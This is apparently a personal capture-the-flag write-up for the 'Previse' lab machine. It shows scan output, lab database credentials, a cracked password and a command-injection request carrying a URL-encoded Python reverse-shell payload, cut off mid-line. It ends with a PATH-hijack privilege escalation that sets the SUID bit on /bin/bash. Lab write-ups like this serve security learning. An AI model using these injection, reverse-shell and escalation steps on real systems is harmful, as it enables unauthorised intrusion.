Kzk's garden

Machine Previse - Active - Easy

2 min read

Machine Previse - Active - Easy

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
fuzzing
  • no extension
  • php extension
    • we found some php that need to be auth to see
    • config.php
    • nav.php shows propably php files
    • accounts.php
      • there is a redirect, but you still see the page in curl
      • we could do a post to create a new user/password :devil:
      • YEEY we got a user :D
  • txt extension
inspecting web page
  • there is a login
  • it says a file service
  • is using phpsession
  • no js or comments
Step 2: what we can do with an admin user…
  • there is a file uploaded by newguy
    • there is a config.php with mysql credentials
    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';

in the code we see this


$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

$filepath = "/var/www/out.log";
$filename = "out.log";

which could be a way to execute whatever we want :)

curl 'http://10.10.11.104/logs.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.11.104' -H 'Connection: keep-alive' -H 'Referer: http://10.10.11.104/file_logs.php' -H 'Cookie: PHPSESSID=t3t07dbpsn2et1o41iapan02ch' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'delim=%24%28python%20-c%20%27import%20socket%2Csubprocess%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.conn

we got our shell :)

Step 3: we are www-data now what?
  • we can not see yet the user flag :(
  • we can connect to the db and get the flag
  • ,'m4lwhere','$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.'
  •                      `$1$🧂llol$DQpmdvnb7EeuO6UaqRItf`
  • we can try to crack it with john the ripper ilovecody112235! user m4lwhere
Step 4: to be root …
  • sudo -l
    • we can execute a script as root
    • the binaries in the script don’t have full path
    • so we can exploit the PATH env variable to execute the code we want :)
$  export PATH=$(pwd):$PATH
$ cat /tmp/gzip
#!/bin/bash
chmod u+s /bin/bash
$ sudo /opt/scripts/access_backup.sh

Graph View

Backlinks